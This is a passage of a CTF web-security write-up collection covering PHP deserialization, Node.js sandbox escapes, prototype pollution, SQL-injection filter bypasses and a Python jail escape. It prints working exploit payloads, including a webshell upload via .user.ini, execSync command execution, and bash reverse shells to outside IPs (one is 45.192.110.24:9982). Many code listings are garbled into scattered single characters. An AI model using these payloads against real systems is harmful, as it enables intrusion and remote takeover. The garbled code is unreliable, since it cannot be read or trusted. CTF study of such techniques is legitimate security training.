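    results["allowlist_data"] = restricted_loads(pickle.dumps({"user": "guest", "n": [1, 2]}))
    return results


if __name__ == "__main__":
    print(demo())
```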

[SWPUCTF 2022 新生赛]ez_1zpop

PHP deserialization

< e c { } c { } c { } i } } ? r l l l f p r a a a e h o s s s ( l p r s f { } s p p p f { } f { } f { } f { } s p p p f { } i $ s _ u u u u u u u u u u u u s D e r d n l b b b n n n n f b b b n s a e x c t l l l c c c c i l l l c e t { p g t r i i i t $ t $ r t i t e n i i i t $ $ t a o i e c c c i t i t e i f i c c c c i b b ( r o t o h o h t o o h o ( $ = t n u $ $ $ n i n i u n ( n o $ $ $ n = $ _ i r i m m s s r i r a u t t G u n f n m d d - - n s e $ ; r i f $ h E n g m p 5 5 _ > _ > _ s t _ t l t m t i T s ( m " o 1 2 c i w i $ t e u d h l m h s [ e 0 ( n = = = o m a m t o t r e i = e ( i - ' r ) ) o ' ; ; n p k p h S ( n s s ; ) s > N i ; n h s o e o i t $ t ; ' - t S a o i t u s r t $ r h # > i S l n ' r = p = - i h t u # t a t ' i o ; u ( > n i h c t ; l ] z " c n ) n i g s i t p e ) e ; t e e m ( - s ( s ) ) ( ( w # w p ) > - ) _ : ; $ ) o i > _ / { _ d d - # m i # t / G # x x > p m o w E g g f o p S w T ; ; m ) o t w [ m - r . ' # ( & > i c N ) & f n t S ; m g f S m m ( e ' d ( ) r ] 5 ) . ) ( ; v ; $ i 访 t # p h ' i ; s f - m > m m d 5 1 ) = = m d 5 ( $ t h i s - > m d 5 2 ) & & $ t h i s - > m d 5 1 ! = $ t h i s - > m d 5 2 )

The sink is the fmm function of the fin class; $btitle has to be controlled.

The real entry point is __destruct(); from there, trigger __toString, tamper with the variables using 0x to bypass the md5 check, and point impo at fmm to complete the call.

[西湖论剑 2022]Node Magical Login

Source code: https://github.com/CTF-Archives/2022-xhlj-web-node_magical_login

Key points in main

a } a } a } p ) p ) p ) p p p . . . g c g c p c e o e o o o t n t n s n ( t ( t t t " r " r ( r / o / o " f l f l l l l l l g l a e a e e e g r g r t r 1 . 2 . f . " F " C l C , l , h a h ( a ( e g e r g r c 2 c e 1 e k " k q C q I , C , o , n ( o r n r t r n e t e e e t s r s r q r ) o ) n , o l a r l = l = l e l > e > C s e r o ) r { ( { n = ( r t > r e r e q o { q , l , r l r e e e s r s ) ( ) r e q , r e s )

The corresponding code

f } u n c t t } i r c o y a n t { i } i } } c F f f e h l ( ( l a r r s g e r r r e r r e r 1 q e e e q e e { e C . s s s . s s s o c . . . c . . . n o s s s o s s s { t o e e t o e t t } r k t t a k t a a o i H H t i H t t l e e e u e e u u l s a a s s a s s e . d d ( . d ( ( r u e e 2 u e 2 4 ( s r r 0 s r 0 0 r e ( ( 0 e ( 0 1 e r " " ) r " ) ) q T T . T . . , = h h t = h t t r = i i y = i y y e = s s p = s p p s _ _ e _ e e ) S I I ( " I ( ( { E s s " a s " " C _ _ t d _ t t R T T e m T e e E h h x i h x x T e e t n e t t _ _ _ / " _ / / C F F h ) F h h O l l t l t t O a a m { a m m K g g l g l l I 1 2 " 1 " " E " " ) " ) ) ) , , . , . . { f f s s s l l e f e e a a n l n n g g d a d d 1 2 ( g ( ( . . " 1 " " t t L . Y U o o o t o n S S g o u a t t i S u r r n t G t i i r o h n n s i t o g g u n r ( ( c g O i ) ) c ( n z . . e ) e e t t s . d r r s t P " i i . r a ) m m i r ( ( W m t ) ) e ( ) ) l ) O c ) f o m F e l , a a g d ! m i T n r ! y " ) T o G e t A n o t h e r P a r t o f F l a g ! " )

flag2

f } u n c t l c i } } i e o f e o t n ( l n s c s c o h t } r e r C h l e r c e { e h e e c y a s s e c . k { t . . c k l c c i } c s s k c o o h f h t t C o g d e ( a a o d ( e c c t t n e r . k h r u u t e l c e e s s r = q e o c s ( ( o . n d k . 2 4 l r b g e c s { 0 0 l e o t o t } 0 3 e q d h = d a ) ) r . y e t . . ( b ) = c u t t r o = h ! s y y e d = e = ( p p q y c = 4 e e , . 1 k 0 ( ( r c 6 c " 3 " " e h ) o a ) t t s e { d G . e e ) c e r j x x k . 5 s t t { c t A o / / o o t n h h d L S ( t t e o p { m m ? w 5 " l l r e 5 m " " e r d s ) ) q C R g . . . a a " j j b s c : s s o e e " o o d ( r I n n y ) " n ( ( . ) v { { c { a " " h l m m e i s s c d g g k " " c C : : o h " " d e Y I e c o n : k u v 1 c a 2 o G l 3 d o i 4 e t d ; 1 : A C " n h o e + t c h k c e c h r o e d c P e k a 2 c r : o t " d e O + } f ) c F h l e a c g k : c o " d e + } ) f l a g 2 . t o S t r i n g ( ) . t r i m ( ) } )

For flag1 the key check is

req.cookies.user === "admin"

This gives the first half of the flag: NSSCTF{ac7516ed-eb81

Now for flag2: to trigger it we need

checkcode = checkcode.toLowerCase()

to throw, so that the catch (__) {} block runs; passing an array triggers the error.

P H U C O A A A R C { } O o s o r c c c e o S s e n i c c c f n " T t r t g e e e e t c : - e i p p p r e h / A n n t t t e n e g n g t : - : - r t c e o e - E L : - k t d n T h n a L c f e t y t c n h e o l 4 : p t g t n d a . e p d u t g e g a M : : i a p t " 2 n o / n g : h : n z a / g e / : H a i p n : : / [ T . l p o n 1 1 T n l l d g z o 7 , P s a i e z h d 2 / s / c 4 i - e , 1 c 5 a . p C 4 3 . t . t a , N . , 1 f 0 i n , a 4 . o n d z n , c ( n a e h n 5 n X / . f ; a , : 1 j n l q . 6 2 1 s s a = n , 8 ; o s t 0 s 7 2 n c e . s , 3 L t 9 c 8 8 i f t , n . f 9 u c . , x n c 1 : n 0 x 2 : , 8 8 2 1 6 2 8 1 _ 3 2 , 6 8 3 1 4 8 2 ) / , f 1 A l 3 p a , p g 1 l 2 4 e , W 1 e 5 b , K 1 i 6 t ] / 5 3 7 . 3 6 ( K H T M L , l i k e G e c k o ) C h r o m e / 1 3 4 . 0 . 0 . 0 S a f a r i / 5 3 7 . 3 6

flag

NSSCTF{ac7516ed-eb81-4e8b-8ae2-0ac340cbde79}

[suctf 2019]checkin

A completely new trick for me

When an image is uploaded, the response echoes two entries: the listing of the upload directory, which holds the file we uploaded and a PHP file.

A .user.ini plus an image carrying PHP can be combined into a one-liner webshell; upload the ini first.

GIF89a
auto_prepend_file=shell.jpg

Then upload the image shell.

<script language="php">system('cat /flag');</script>

[GKCTF 2020]ez三剑客-easynode

safer-eval vulnerability

Let's look at the code first.

c c c c c a a a } a } a } a } a } a } o o o o o p p p ) p ) p ) p ) p ) p ) n n n n n p p p ; p ; p ; p ; p p ; s s s s s . . . . . . . . t t t t t u u u i } } p l i } r g r r g r r g r r l c s s s f o e f e e e e e e e e e e i o e b s f a e e e e s t s t s s t s s t s s s n x o a s p ( ( ( ( l t ( . ( . . ( . . ( . . t s p d f p b b ( r l c i } c s } s n ( r r t } } s ' s s ' s s ' s s e o r y e = o o r e e o f o e , e e ' e e r e / e e / e e / e e n l e P r = d d e q t n n t x / s q y c n s t n v t n ' t n ( e s a E r y y q . s ( s T 1 { t e p . a d o ( d e ( d , ( d 8 . s r v e e P P , p d o N d t i 0 ( v o b { r t r ( u ' ( r ' ( ' ( 0 l s a q x a a a e l u e m 0 ) a n o e c e S r C f s C f f C f , o = e l u p r r r t l e m l t e 0 ; l s d s h s t c o s i o s u o s g r i r s s e h a . b a o ) ' e y p p r e n . o n . n n . ' ( r = r e e e s y l e y = u ; , . o ( o i ' t r n t r c t r 0 ' e = e s r r , = o r t = e n e n n , e e ' e e t e e . S q r ( s . . = = g . = s ( f ) s ) s g n a , n a i n a 0 t u r e ' ( u j n = ( i e ( u e e ( f t d t d o t d . a i e q f ) r s e 6 d s M t ) n ' { { r u - F f - F n - F 0 r r q u s ; l o x 0 e I a T c ; = = e n T i u T i T i . t e u i ' e n t / l n t i = t s c y l n y l ( y l 0 ( i r ) n ( ) e a t h m > i s ' p t p e c p e r p e ' l ' r e ; c ) v y e . e o a W o i e S t e S e e S , i e e ( o ) = a 1 ) g m o { n f r n o ' y i ' y q ' y s x ( ' d ; > l 0 ; e a u c e o s n , n o , n , , n t p ' s e ' 0 r x t l ( r n e c n c c e r b a d { ) 0 ( ( ( e r E g ) ( ' ( ' ( r ' ( n e o f ( ; p d ( a e v ) r t ' ( t ' e t ' = i s d e { { a e ) r q a W ; e e . r e . s e . > n s y r r l T , l r q x / e x / ) x / g ' - - e s a = i ( o , t i q t p t i { ' ) p e x e y > m r r n / n , / a { / n ) ; a v t I , e e e g r j d j c h d r a e n n o s q e a e r s k t e s l n t p e u ) . W s v x e o a m x e ' d ( a x t b r ) a . s n g l . r ) e r r t ( { o o s j ) ; e ; h ' ; d e s ( t d n { c s c . c t ) : q e ) ) y g r ' { h j h m ; . I , ; . ! 
i ) a s a l f q n c e ! p ) r o r ' a u t d o ) ! t ; s n s ) l e ( e n ; ! ; e ' e ) s r r l s ' c t ) t e y e a o ; h = ) = . q y l a u ; u } d . ) e r t t ) e q ; . s f f ) l u l e - - ; a e o t 8 8 y r g = ' ' ) y ( u ) ) ) . ' t ; ; ) d t f e i - { l m 8 a e ' y o ) ) u ; ) t ; ' ) ; t r y { r e s . s e n d ( ' T i m e o u t ! ' ) ; } c a t c h ( e ) { }

Two key points

a } a } p ) p ) p ; p ; . . u i } } p l i } r s f o e f e e e s t s ( ( l t ( . ( r l c i } c s } s n ( r r t } } s r e e o f o e , e e ' e e r e e q t n n t x / s q y c n q . s ( s T 1 { t e p . a d , p d o N d t i 0 ( v o b { r t r ( a e l u e m 0 ) a n o e c e S r t l e m l t e 0 ; l s d s h s t e h a . b a o ) ' e y p p r s y l e y = u ; , . o ( o i , = o r t = e n e n n = = g . = s ( f ) s ) s g n = ( i e ( u e e ( e 6 d s M t ) n ' { { r x 0 e I a T c ; = = e t / l n t i = t s ) e a t h m > i s ' p v y e . e o a W o = a 1 ) g m o { n f r n > l 0 ; e a u c e o s ' 0 r x t l ( r n e { ) 0 ( ( ( e r E g ) ; p d ( a e v ) { a e ) r q a W ; r l T , l r s a = i ( o e y > m r r n I , e e e g n n o s q t p e u ) . W ( a x t b r r r t ( { o o e s ( t d n q e ) ) y g . I , ; . ! q n c e ! u t d o ) ! e ( e n ; ! r r l s ' y e a o ; . q y l d . ) e e q ; . l u l a e o y r g ) y ( ) . ' ) d t e i { l m a e y o ) u ) t ; ' ) ; t r y { r e s . s e n d ( ' T i m e o u t ! ' ) ; } c a t c h ( e ) { }

A new trick here: the setTimeout overflow bypass. The delay is stored as a 32-bit signed integer underneath, so the maximum is 2147483647.

Passing 2147483648 overflows it, so the callback runs immediately.

Back to the eval route

response = saferEval(req.body.e);

The library used here has a sandbox escape; the following can be used

(function(){
    const process = clearImmediate.constructor("return process;")();
    return process.mainModule.require("child_process").execSync("cat /flag").toString()
})()

to complete the escape.

[HZNUCTF 2023 final]eznode

vm2 sandbox escape

c c c a c } c c } c } a } a } a } o o o p o o o o p ) p ) p ) n n n p n n n n p ; p p ; s s s . s s s s . . . t t t u t t } } t t f } r t r g r p t } } l c s r o e e e e o r c i o e a { e b y c i m r t c t t s s y a s n x p ( a a s e u l u ( . t t t s p p V e c { n t c O r i } } r o r ' s ( { c v v i } r c r c e o r M x k e c o b g v f n n n / e ' o a a f e h e o n l e = p d w h n j e a e e ' n / n r r s ( s n ( e s } r o s e r ( l a m , d ' s ( . e . s 3 . s e e o V ( o c = i m s a = e ( , o b c c b s ) s o 0 l x = s r M e l t a s e e [ r f " l o o o a e { e l 0 o = p s ( ) e ( t O r a ( g u P f e d p p c n n e 0 g r r . = ) . = a t b g { t a e n O u . y y y k d d . , ( r e e j . { l , r j e t ) ( c S n l b b d ( ( l ' e s q s f r o o e ( r { t T c o = o o o " " o f s q s u o u u g b b i c a ] = } i t g d d o p i g u t u ( i n n n ( j ) n t [ > , o s i ( J y y r o s ( n a i ) r ( c ( e ( a = n o o r S . ( s e c r r ; e ) t { ) = = b a t { a m n e O = s ) t i ) t t e ( ) i } ; > > ) [ t b ) ( e q N h t i ( ' ; o . a r [ ; r ( . . c i s o l ' v n s o { { t ] a e j r b p l t h s n i e m h b t , t q s e o a o ) i h s x 2 e j r t , o q d r n t i t p ' l ] b r n , y s e { t e r ) l & ) [ ] r ) e ( o n e ; { c & a ; e s r ( b k ? { i s o & t s h e J o " " n s d o & t ) i s S d ) ) g ' e b r t ) O y ) ) j i ] { N ) o ; ; . s ) t { . n c O ; o s o b t p n j r o s e i r t c n t r t g u ( n i 3 c b o f 0 t [ y 0 o a s ( 0 r t o r ' t u e ) & r r q ; & ] c . ) e b o ) o b c d j { o y . d ) c e ) o ; n a s n t d r u t c r t y o r t o = = f = i n O d b j s e o c u t r ; c e c o d e " ) ;

There is a very blunt merge function and a backdoor function that runs the code left behind by prototype pollution.

new VM().run({}.shellcode);

The key is the vm2 bypass; see https://xz.aliyun.com/news/11305 for details.

{"shit":1,"__proto__":{"shellcode":"let res = import('./app.js'); res.toString.constructor(\"return this\").process.mainModule.require(\"child_process\").execSync('bash -c \"bash -i >& /dev/tcp/45.192.110.24/9982 0>&1\"').toString();"}}

Note that the shit key must be present and the Content-Type must be application/json.

pass

[鹏城杯 2022]压缩包

Let's look at the code first.

< h f } f $ s $ f e ? ? i u u c h f i c > p g n n o e p l h h h c c n l a e o p l t $ f } t } t l t c _ i i l o Z i e / _ h o p u g i r I o n t e n u n h n s e i } } P n t m x = t t z t t a f e $ $ $ $ i } i f } $ u r } } = p e " e _ i _ r = c ( u l u r z z d f f o z n e e c / n c p f e h i n s n e i i i ( ( r i l t l $ ( t t o ( i m s s l e z s p p r ! $ e p i u s _ ' m n $ l o c ( _ i i u - i m z a $ $ $ $ i } i } - n r e r R r / p t f e v a $ f n . i p l = > = s k i c f f f f f f > k n { e E m t / b e p ( e n l i k f ( t o _ d p h i i i i ( ( c ( t Q m " a n a _ d d i l ( ( $ n p $ d i - l l l l i ! l $ j u U - p . s t t _ i / i s e $ $ r f = e e _ i r > ( e e e e s r p i } } o f s r E r m e s h F r r t ( d v e i w n S r ( e s _ _ _ _ _ e r f e s i o n S f m d 6 ( ) I ( ( $ i a m l [ ( E ( $ x c e e e e d m e ( l e l n T d 5 4 $ ; L $ $ a d r l o e ] Z $ R $ d t a x x x x i o g i s ( e _ f [ / 5 ( f E d d s i . u v n ; i f V d i r n t t t t r v _ s u e i a ) n e a ' t ( $ p _ i i r ' e e a p i E i r a d = = = = ( e m _ n { f r ; a n l c m c c a _ r r . ! d m A l R r ) c i s s s t $ d a f l ( r m c s o p o o t ) ) ) $ ' = i e r e [ ) ; t r t t t r d i t i i $ a e o e n / n n h ; { ; v . " r ) c n ' ) T ( r r r i i r c l n v y ) d ; t * t t , a $ . ( { h a D { o $ r t _ m r ( h e k a _ ; e e ' e e l . v " $ i m O ( d c o i ( . $ ( ( ( l p ( n ) n n b u $ a & d v e C $ i h l r $ " d " $ $ u u $ t ; t t a e v l & i e ) U d r r o e f / i / d d e s r ' ) ) s ) a u $ r ( ; / M i ) ( w p i " r j i i ! h e ] ; e l e v . ) s E r $ e l l . ) p r r = ( s ; 6 { u ) a ' ; t N ) a v r a e $ ; g . . " $ u 4 e ; l / a T ) s a ( c _ v | " " . r l _ ) u ' t _ { l $ e e a p / / " e t d ) e . i R u f ( x l n " " & s Z ) e { ! $ c O $ e i ' t u g . . & u I ; c = v Z / O v , l : ) e | $ $ $ l P o " a I u T a e : ; ) g v v v t d . l P p ' l _ $ & i a a a , e . u l ] u e D & f l l l $ ( " e o . e x A $ | u u u v $ ) ) a " ) ) t T v j e e e a c { ; d ; ) A a p ) ) ! 
l o s { ; ' l e ) ; = u n m t , u g { " e c t d a e / . ) o e 5 t ! i . ; n n ( i ' = s " t t c , " " ) e ) / . , n ) u $ " $ t ; ) p f & f l i & i o l $ l a e v e d _ a _ / e l e " x u x . t e t m ) ! ) d ; = ) 5 / " { ( / . $ . f " i ) l N { e T n F a S m e ) ;

The archive is extracted first and the files are walked afterwards, so accessing a file before the walk deletes it would be a race condition... in theory. I tried for a long time without success and switched to another approach.

Failing the extraction

i f ( $ z i p } } - e > l e s x e r t { e r t a u c r t n T o f ( a $ l d s i e r ; ) ) {

The extraction is wrapped in an if, so on Linux one can craft a malformed zip that makes extraction report an error after the webshell has already been written out.

z r m e z i m k c i p d h p a i o - . r - y p 1 y h a e p . > e x p x p h p . p / . z a z i . i p p p h a p a . / . p 1 p h h p p / 1

Another trick I had not seen before.

[GKCTF 2021]easynode

It opens on a login page; look at the code first.

app.post('/login',function(req,res,next){

    let username = req.body.username;
    let password = req.body.password;
    safeQuery(username,password).then(
        result =>{
            if(result[0]){
                const token = generateToken(username)
                res.json({
                    "msg":"yes","token":token
                });
            }
            else{
                res.json(
                    {"msg":"username or password wrong"}
                    );
            }
        }
    ).then(close()).catch(err=>{res.json({"msg":"something wrong!"});});
  })
  let safeQuery =  async (username,password)=>{

    const waf = (str)=>{
        // console.log(str);
        blacklist = ['\\','\^',')','(','\"','\'']
        blacklist.forEach(element => {
            if (str == element){
                str = "*";
            }
        });
        return str;
    }

    const safeStr = (str)=>{ for(let i = 0;i < str.length;i++){
        if (waf(str[i]) =="*"){
            
            str =  str.slice(0, i) + "*" + str.slice(i + 1, str.length);
        }
        
    }
    return str;
    }

    username = safeStr(username);
    password = safeStr(password);
    let sql = format("select * from test where username = '{}' and password = '{}'",username.substr(0,20),password.substr(0,20));
    // console.log(sql);
    result = JSON.parse(JSON.stringify(await select(sql)));
    return result;
}

The target is SQL injection, but there is filtering; we need to bypass it to close the single quote.

I scratched my head here for a long time; later I saw this solution in a writeup:

    let testUsername = ["' or 1 #",")"];
    let testPassword = '123456';

safeStr checks the contents of the two array elements, and because ) triggers

str = str.slice(0, i) + "*" + str.slice(i + 1, str.length);

the check on ' is bypassed.

So we can construct

username[]=' or 1 #&username[]=(&password=foo

Login succeeds. Back in the code, we can see it pulls in the library affected by CVE-2021-2594

var extend = require("js-extend").extend
var addDIV = `{"${username}":{"${key}":"${data[key]}"}}`;
extend(board,JSON.parse(addDIV));

From the /adminDIV code, what we control is data; EJS prototype pollution can give code execution, but username also needs to be controllable, and that is done in the addAdmin function.

app.post("/addAdmin",async (req,res,next) => {
    let username = req.body.username;
    let password = req.body.password;
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result !='err'){
        gift = JSON.stringify({ [username]:{name:"Blue-Eyes White Dragon",ATK:"3000",DEF:"2500",URL:"https://ftp.bmp.ovh/imgs/2021/06/f66c705bd748e034.jpg"}});
        var sql = format('INSERT INTO test (username, password) VALUES ("{}","{}") ',username,password);
        select(sql).then(close()).catch( (err)=>{console.log(err)}); 
        var sql = format('INSERT INTO board (username, board) VALUES (\'{}\',\'{}\') ',username,gift);
        console.log(sql);
        select(sql).then(close()).catch( (err)=>{console.log(err)});
        res.end('add admin successful!')
    }
    else{
        res.end('stop!!!');
    }
});

Create a user named __proto__ and then do the pollution.

{"outputFunctionName":"__tmp1;return global.process.mainModule.constructor._load('child_process').execSync('**/bin/bash -i >& /dev/tcp/45.192./8872 0>&1**'); __tmp2"}

In theory this works, but the NSS instance did not respond.

[SEETF 2023]Express JavaScript Security pbidle

Look at the provided attachments first.

index.js

const express = require('express');
const ejs = require('ejs');

const app = express();

app.set('view engine', 'ejs');

const BLACKLIST = [
    "outputFunctionName",
    "escapeFunction",
    "localsName",
    "destructuredLocals"
]

app.get('/', (req, res) => {
    return res.render('index');
});

app.get('/greet', (req, res) => {
    
    const data = JSON.stringify(req.query);

    if (BLACKLIST.find((item) => data.includes(item))) {
        return res.status(400).send('Can you not?');
    }

    return res.render('greet', {
        ...JSON.parse(data),
        cache: false
    });
});

app.listen(3000, () => {
    console.log('Server listening on port 3000')
})

readflag.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>  /* setuid() */

int main()
{
    setuid(0);
    system("/bin/cat /root/flag.txt");
    return 0;
}

DockerFile

FROM node:18-bullseye-slim

RUN apt-get update && \
apt-get install -y dumb-init gcc && \
rm -rf /var/lib/apt/lists/*

RUN addgroup ejs && \
adduser --disabled-password --gecos "" --ingroup ejs ejs

WORKDIR /home/ejs/app
RUN chown -R ejs:ejs .

COPY views ./views
COPY main.js package.json ./

RUN npm install

COPY flag.txt /root/flag.txt

COPY readflag.c /readflag.c
RUN gcc -o /readflag /readflag.c && rm /readflag.c
RUN chmod +rxs /readflag

USER ejs

ENTRYPOINT ["/usr/bin/dumb-init", "--"]
CMD ["node", "./main.js"]

One key point: outputFunctionName is banned, which means the only options left are prototype pollution and template injection. According to

https://github.com/mde/ejs/issues/730

other pollutable options can be found to exploit.

Based on that we can construct

greet?name=1&font=Arial&fontSize=20&settings[view options][client]=1&settings[view options][escape]={}.constructor.constructor("return process.mainModule.require('child_process').execSync('/readflag >> /home/ejs/app/views/index.ejs')")

which runs readflag and appends its output to index.ejs, so the flag can be read from the page.

[NSSRound#12 Basic]strange python

A very interesting challenge.

We get a standard Python shell with unrestricted command execution but very low privileges; env shows no flag, and it is not in the root directory either.

$ env
env
MAIL=/var/mail/ctf
USER=ctf
HOSTNAME=0476e736174f4dea
SHLVL=1
SOCAT_PEERADDR=109.166.37.80
HOME=/home/ctf
SOCAT_PEERPORT=59998
SOCAT_SOCKADDR=172.18.0.10
LC_CTYPE=C.UTF-8
SOCAT_VERSION=1.7.4.1
SOCAT_SOCKPORT=9999
LOGNAME=ctf
_=ls
COLUMNS=80
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
PYTHONSTARTUP=/opt/python/preload.py
SHELL=/bin/sh
PWD=/
SOCAT_PID=27
SOCAT_PPID=10
LINES=24
FLAG=no_FLAG
$ cat /opt/python/preload.py
cat /opt/python/preload.py
cat: /opt/python/preload.py: Permission denied
$ ls -la /opt/python/preload.py
ls -la /opt/python/preload.py
-rwx-w---- 1 root root 209 May 13 06:19 /opt/python/preload.py

The file is highly privileged. Back in the Python shell, dir() shows a __flag__ in scope, which is the shuffled flag; presumably it was loaded by preload. Since Python can load that file, we can try reading it with Python's open().

neko@aosc-neko205 [ ~ ] $ nc node4.anna.nssctf.cn 28111
Python 3.10.6 (main, Mar 10 2023, 10:55:28) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> dir()
dir()
['__annotations__', '__builtins__', '__doc__', '__flag__', '__loader__', '__name__', '__package__', '__spec__', 'random', 'seed', 'shuffle']
>>> __flag__
__flag__
['9f', '66', '1f', 'SC', '-4', 'd-', '31', '9e', 'd4', 'NS', '9f', 'cf', '8}', 'TF', '-7', '16', '26', '5b', '57', '88', '{d', '1-']
>>> open('/opt/python/preload.py').read()
open('/opt/python/preload.py').read()
'import re\nimport random\nfrom random import shuffle\nseed=114514\nrandom.seed(114514)\nflag="NSSCTF{dd457881-1626-4cfd-9f31-75b9e9f661f8}"\nflag=re.findall(r\'.{2}\', flag)\nshuffle(flag)\n__flag__=flag\ndel re\ndel flag'
>>> 

[NCTF 2018]baby Python

Testing shows that a statement that executes successfully returns Wh4t_Th3_Err0r?; to see any output you need print.

>>> print(dir())   
['Th1s_1S_WAF', '__builtins__', '__doc__', '__file__', '__name__', '__package__', 'data', 'no', 'print_function', 'targets', 'x']
>>> print(Th1s_1S_WAF)
['import', 'exec', 'eval', 'pickle', 'os', 'subprocess', 'input', 'cry sum more', 'sys', 'linecache', 'globals', 'flag', 'file', 'pop', 'getattr', 'class', 'mro', 'bases', 'subclasses', 'init', ']', '[']
>>> 

The WAF is presumably just a ban list.

>>> print(__builtins__.__dict__)
{'dir': <built-in function dir>, 'print': <built-in function print>, 'raw_input': <built-in function raw_input>}

That's extreme.. the builtins have been stripped bare, so we escape through the inheritance chain; first find its subclasses.

>>> print([].__class__.__base__.__subclasses__())Wh4t_Th3_Err0r?
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>]

After a long search, <class 'warnings.catch_warnings'> turns out to be usable. Comparing a local Python 2 against the target environment shows the subclass lists are essentially identical, so the index is looked up with the local Python 2.

for i in enumerate(''.__class__.__mro__[-1].__subclasses__()): print i
(59, <class 'warnings.catch_warnings'>)
print([].__class__.__base__.__subclasses__()[59].__init__.__globals__)

Look for the linecache module: the __globals__ attribute of the __init__ function returns every global variable of the module the function is defined in.

>>> print([].__class__.__base__.__subclasses__()[59].__init__.__globals__)
{'filterwarnings': <function filterwarnings at 0x7f094be1c7d0>, 'once_registry': {}, 'WarningMessage': <class 'warnings.WarningMessage'>, '_show_warning': <function _show_warning at 0x7f094be1c450>, 'filters': [('ignore', None, <type 'exceptions.DeprecationWarning'>, None, 0), ('ignore', None, <type 'exceptions.PendingDeprecationWarning'>, None, 0), ('ignore', None, <type 'exceptions.ImportWarning'>, None, 0), ('ignore', None, <type 'exceptions.BytesWarning'>, None, 0)], '_setoption': <function _setoption at 0x7f094be1cbd0>, 'showwarning': <function _show_warning at 0x7f094be1c450>, '__all__': ['warn', 'warn_explicit', 'showwarning', 'formatwarning', 'filterwarnings', 'simplefilter', 'resetwarnings', 'catch_warnings'], 'onceregistry': {}, '__package__': None, 'simplefilter': <function simplefilter at 0x7f094be1c8d0>, 'default_action': 'default', '_getcategory': <function _getcategory at 0x7f094be1ca50>, '__builtins__': {'dir': <built-in function dir>, 'print': <built-in function print>, 'raw_input': <built-in function raw_input>}, 'catch_warnings': <class 'warnings.catch_warnings'>, '__file__': '/usr/local/lib/python2.7/warnings.pyc', 'warnpy3k': <function warnpy3k at 0x7f094be1c9d0>, 'sys': <module 'sys' (built-in)>, '__name__': 'warnings', 'warn_explicit': <built-in function warn_explicit>, 'types': <module 'types' from '/usr/local/lib/python2.7/types.pyc'>, 'warn': <built-in function warn>, '_processoptions': <function _processoptions at 0x7f094be1c950>, 'defaultaction': 'default', '__doc__': 'Python part of the warnings subsystem.', 'linecache': <module 'linecache' from '/usr/local/lib/python2.7/linecache.pyc'>, '_OptionError': <class 'warnings._OptionError'>, 'resetwarnings': <function resetwarnings at 0x7f094be1c850>, 'formatwarning': <function formatwarning at 0x7f094be1c750>, '_getaction': <function _getaction at 0x7f094be1cad0>}

The target among them is:

<module 'linecache' from '/usr/local/lib/python2.7/linecache.pyc'>
>>> print(dir([].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache']))
['__all__', '__builtins__', '__doc__', '__file__', '__name__', '__package__', 'cache', 'checkcache', 'clearcache', 'getline', 'getlines', 'os', 'sys', 'updatecache']
>>> print([].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].os.system('id'))
uid=0(root) gid=0(root) groups=0(root)
0
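The Th1s_1S_WAF list printed above is a substring blacklist, and the session shows the escape chain got through even though it contains 'class', 'globals' and '['. As an added example (not the challenge's code and not the author's), here is the same input checked two ways: the substring blacklist that list implies, and a structural check that parses the source with the ast module and rejects any access to a __dunder__ attribute or name. The sample inputs are constructed; the escape chain is the one from the session above, and all function names are my own.

```python
import ast

# Words the page's Th1s_1S_WAF list blocks (copied from the REPL output above).
WAF_WORDS = ['import', 'exec', 'eval', 'pickle', 'os', 'subprocess', 'input',
             'cry sum more', 'sys', 'linecache', 'globals', 'flag', 'file', 'pop',
             'getattr', 'class', 'mro', 'bases', 'subclasses', 'init', ']', '[']

# Constructed sample inputs: the chain from the session, a harmless expression,
# and a harmless expression that a substring blacklist wrongly rejects ('chaos' contains 'os').
ESCAPE_CHAIN = ("print([].__class__.__base__.__subclasses__()[59]"
                ".__init__.__globals__['linecache'].os.system('id'))")
BENIGN = "print(sum(x * x for x in range(10)))"
FALSE_POSITIVE = "print(len('chaos'))"


def string_blacklist_hit(src, words=WAF_WORDS):
    """The kind of check the page's WAF list implies: return every banned substring found."""
    return [w for w in words if w in src]


class DunderWalker(ast.NodeVisitor):
    """Record every attribute or name that reaches into interpreter internals."""

    def __init__(self):
        self.findings = []

    @staticmethod
    def _is_dunder(name):
        return name.startswith('__') and name.endswith('__')

    def visit_Attribute(self, node):
        if self._is_dunder(node.attr):
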